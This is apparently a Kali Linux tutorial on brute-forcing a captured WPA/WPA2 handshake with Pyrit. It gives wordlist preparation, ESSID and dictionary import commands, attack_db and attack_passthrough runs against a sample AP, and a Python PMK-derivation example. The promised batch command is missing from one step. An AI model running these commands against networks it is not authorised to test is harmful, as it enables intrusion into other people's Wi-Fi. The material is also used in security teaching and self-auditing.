Benefits of using Pyrit
Cracking a captured handshake is the only way to recover WPA/WPA2 passwords, and it is done by brute force.
By the way, if you are not familiar with the handshake capture technique, refer to the article “Handshake Capture in Kali Linux”.
Since the use of bruteforce does not guarantee a positive result, several techniques have been invented that can significantly increase the chances of success. These include:
- use of video cards for password selection (significantly increases the search speed)
- use of tables with pre-calculated hashes (increase in speed + reusability for the same access point, the ability to try dozens of handshakes from one access point in seconds)
- use of good dictionaries (increases the chances of success)
Pyrit can use all of these techniques, which makes it the fastest WPA/WPA2 password cracker, or at least one of the two strongest alongside oclHashcat.
Other programs implement these techniques too. For example, both oclHashcat and coWPAtty implement dictionary attacks. coWPAtty supports precomputed hashes (but cannot use graphics cards). oclHashcat can use the power of graphics cards, but does not precompute hashes. Looking ahead, I note that in oclHashcat you can also precompute hashes and reuse the data for one access point to check several handshakes without recomputing them, as will be described later. Aircrack-ng walks through the dictionary and makes good use of multi-core processors, but uses no other “acceleration”.
On my system, oclHashcat brute-forces WPA/WPA2 passwords at 31550 H/s, while Pyrit computes hashes at 38000-40000 PMKs per second; checking the handshakes afterwards takes less than a second. So even when checking a single handshake we gain about a third in speed, and if we want to check several handshakes for one AP, oclHashcat has to start all over again, whereas in Pyrit every new handshake takes a split second.
For Pyrit to unleash its full power, you need the proprietary drivers installed for your graphics card, whether AMD or NVIDIA.
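To show why a precomputed table is bound to one ESSID (and why a long passphrase and an unusual ESSID are the defender's answer to such tables), here is an added Python example, not from the original page and not Pyrit's code, that derives the WPA-PSK PMK exactly as IEEE 802.11i defines it: PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID, 4096 iterations, 256-bit output. The test vector ("password" / "IEEE") is the one published in the 802.11i annex; the DANIELLE2015/DANIELLE2016 comparison uses a constructed passphrase.

```python
import hashlib

PMK_ITERATIONS = 4096   # fixed by 802.11i; this is what makes each PMK costly
PMK_LEN = 32            # 256-bit PMK


def is_valid_passphrase(passphrase: str) -> bool:
    """802.11i allows 8 to 63 printable ASCII characters (the same
    bounds pw-inspector -m 8 -M 63 enforces when trimming a wordlist)."""
    if not 8 <= len(passphrase) <= 63:
        return False
    return all(32 <= ord(c) <= 126 for c in passphrase)


def wpa_pmk(essid: str, passphrase: str) -> bytes:
    """Derive the PMK from ESSID + passphrase as WPA/WPA2-PSK does.

    The ESSID is the salt, so a table of PMKs computed for one ESSID
    is useless against an AP with a different ESSID, which is why
    Pyrit stores tables per ESSID and can re-check any number of
    handshakes from that one AP almost instantly."""
    if not is_valid_passphrase(passphrase):
        raise ValueError("WPA/WPA2 passphrase must be 8-63 printable ASCII chars")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), essid.encode("utf-8"),
        PMK_ITERATIONS, PMK_LEN)


def same_pmk_across_essids(essid_a: str, essid_b: str, passphrase: str) -> bool:
    """True only if the same passphrase yields the same PMK on both ESSIDs."""
    return wpa_pmk(essid_a, passphrase) == wpa_pmk(essid_b, passphrase)


if __name__ == "__main__":
    # Published 802.11i test vector: should print
    # f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    print(wpa_pmk("IEEE", "password").hex())
    # Constructed passphrase: a table built for DANIELLE2015 does not
    # transfer to DANIELLE2016, even though only the ESSID changed.
    print(same_pmk_across_essids("DANIELLE2015", "DANIELLE2016", "Summer-2015!"))
```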
Fastest Hacking WPA / WPA2 Passwords
My starting data:
- attacked AP – DANIELLE2015
- the file with the pre-captured handshake is called DANIELLE2015-01.cap
WPA/WPA2 Hacking Dictionary
I will use the rockyou dictionary that ships with Kali Linux. For learning this is quite enough; for practical attacks I can recommend generated dictionaries of phone numbers, or dictionaries generated for a specific AP of the form name_DT + digits that fill the passphrase out to eight characters. Let’s copy the dictionary file to the working directory and unpack it.
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
Since a WPA2 passphrase must be at least 8 and at most 63 characters, let’s filter the file so that every entry shorter than 8 or longer than 63 characters is dropped (you can skip this step entirely, it is up to you). We save the result as newrockyou.txt; sort -u also removes duplicate entries:
sort -u rockyou.txt | pw-inspector -m 8 -M 63 > newrockyou.txt
Let’s see how many passwords this file contains:
wc -l newrockyou.txt
There are as many as 9606665 passwords.
The original file contains even more.
wc -l rockyou.txt
There are 14344392 passwords, so we have made the file shorter, which means we can test the AP in less time.
Finally, let’s rename this file to wpa.lst.
mv newrockyou.txt wpa.lst
Create an ESSID in the Pyrit database
Now we need to create an ESSID in the Pyrit database.
pyrit -e DANIELLE2015 create_essid
ATTENTION: If the AP name contains a space, for example “NetComm Wireless”, then your command will look like this:
pyrit -e 'NetComm Wireless' create_essid
Great, we now have an ESSID added to the Pyrit database.
Import dictionary into Pyrit
Now that the ESSID has been added to the Pyrit database, let’s import our password dictionary.
Use the following command to import the previously created wpa.lst password dictionary into the Pyrit database.
pyrit -i /root/wpa.lst import_passwords
Create tables in Pyrit using the batch process
It’s easy, just type the following command.
Since I am running this on a laptop, I get 38000-40000 PMKs per second. This is far from the limit: a desktop with a good graphics card will speed these calculations up considerably.
Keep an eye on how large your dictionary file is and how hot your processor and graphics card get. Use additional cooling to avoid damage.
Hacking process with pyrit
We will attack the handshake using the database of precomputed hashes. Now that all the preparation steps are done, launching the attack is very easy; just use the following command.
pyrit -r DANIELLE2015-01.cap attack_db
That’s all. The whole process, including the precomputation of the hashes, took a few minutes; going through the entire database table to find the password, if it is present in the dictionary, took less than a second. My speed reached 6322696 PMKs. This is definitely the fastest.
If the password could not be recovered, immediately try the --all-handshakes option. Instead of checking only one handshake (the best one), it checks all available ones. The point is that even the best handshake may have been reconstructed incorrectly, in which case the password is present in the dictionary but the program cannot identify it. So, to check all available handshakes, do this:
pyrit --all-handshakes -r DANIELLE2015-01.cap attack_db
It takes seconds, so you should always use it if the password is not found.
A handshake attack with a dictionary in Pyrit without using pre-calculated tables
If you don’t want to create a database but want to search the dictionary file directly (which is much slower), you can do the following:
pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough
The speed this way? 17807 PMKs per second. Much slower, for my taste.
Cleaning up Pyrit and its database
Finally, if necessary, you can delete your ESSID and clean up.
pyrit -e DANIELLE2015 delete_essid
This will free up quite a lot of disk space.